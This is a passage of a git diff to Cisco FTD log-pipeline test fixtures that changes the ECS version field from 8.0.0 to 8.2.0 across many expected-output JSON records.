+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11760,7 +11760,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11844,7 +11844,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -11929,7 +11929,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12014,7 +12014,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12098,7 +12098,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12181,7 +12181,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12260,7 +12260,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12344,7 +12344,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12397,7 +12397,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12475,7 +12475,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12559,7 +12559,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12643,7 +12643,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12727,7 +12727,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12811,7 +12811,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12895,7 +12895,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -12979,7 +12979,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13063,7 +13063,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13146,7 +13146,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13225,7 +13225,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13309,7 +13309,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13393,7 +13393,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13476,7 +13476,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13555,7 +13555,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13638,7 +13638,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13717,7 +13717,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13800,7 +13800,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13879,7 +13879,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13963,7 +13963,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14047,7 +14047,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14126,7 +14126,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14209,7 +14209,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14288,7 +14288,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14372,7 +14372,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14457,7 +14457,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14542,7 +14542,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14626,7 +14626,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14705,7 +14705,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14788,7 +14788,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14867,7 +14867,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14951,7 +14951,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15035,7 +15035,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15119,7 +15119,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15203,7 +15203,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15282,7 +15282,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15365,7 +15365,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15444,7 +15444,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15528,7 +15528,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15613,7 +15613,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15697,7 +15697,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15776,7 +15776,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15859,7 +15859,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15938,7 +15938,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15991,7 +15991,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16038,7 +16038,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16085,7 +16085,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16132,7 +16132,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16179,7 +16179,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16226,7 +16226,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16273,7 +16273,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16320,7 +16320,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16367,7 +16367,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16414,7 +16414,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16461,7 +16461,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16508,7 +16508,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16555,7 +16555,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16602,7 +16602,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16649,7 +16649,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16726,7 +16726,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16805,7 +16805,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16858,7 +16858,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16905,7 +16905,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16983,7 +16983,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17067,7 +17067,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17151,7 +17151,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17235,7 +17235,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17318,7 +17318,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17397,7 +17397,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17450,7 +17450,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17497,7 +17497,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17544,7 +17544,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17591,7 +17591,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17638,7 +17638,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17685,7 +17685,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17732,7 +17732,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17810,7 +17810,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17894,7 +17894,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -17975,7 +17975,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18056,7 +18056,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18137,7 +18137,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18216,7 +18216,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18299,7 +18299,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18380,7 +18380,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18461,7 +18461,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18542,7 +18542,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18623,7 +18623,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18704,7 +18704,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18785,7 +18785,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18866,7 +18866,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -18947,7 +18947,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19028,7 +19028,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19109,7 +19109,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19190,7 +19190,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19271,7 +19271,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19352,7 +19352,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19433,7 +19433,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19514,7 +19514,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19595,7 +19595,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19676,7 +19676,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19757,7 +19757,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19838,7 +19838,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -19919,7 +19919,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20000,7 +20000,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20081,7 +20081,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20162,7 +20162,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20243,7 +20243,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20324,7 +20324,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20405,7 +20405,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20486,7 +20486,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20567,7 +20567,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20648,7 +20648,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20729,7 +20729,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20810,7 +20810,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -20891,7 +20891,7 @@
 },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json
index da14c02fbdd..3ba16e735fe 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json
@@ -64,7 +64,7 @@
 },
 "@timestamp": "2019-08-26T23:11:03.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -207,7 +207,7 @@
 },
 "@timestamp": "2019-08-26T23:11:03.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -352,7 +352,7 @@
 },
 "@timestamp": "2019-08-26T23:11:03.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -495,7 +495,7 @@
 },
 "@timestamp": "2019-08-26T23:11:03.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -640,7 +640,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -784,7 +784,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -927,7 +927,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1073,7 +1073,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1216,7 +1216,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1360,7 +1360,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1505,7 +1505,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1644,7 +1644,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1785,7 +1785,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1929,7 +1929,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2072,7 +2072,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2216,7 +2216,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2361,7 +2361,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -2504,7 +2504,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2647,7 +2647,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2789,7 +2789,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2931,7 +2931,7 @@ }, "@timestamp": "2019-08-26T23:11:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index e815fb47d6a..bd1014bfef8 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json @@ -13,7 +13,7 @@ }, "@timestamp": "2019-01-01T01:00:27.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -60,7 +60,7 @@ }, "@timestamp": "2019-01-01T01:00:30.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json index f511a28b4e0..46d0510c120 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json @@ -11,7 +11,7 @@ }, "@timestamp": "2019-08-14T13:56:30.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" 
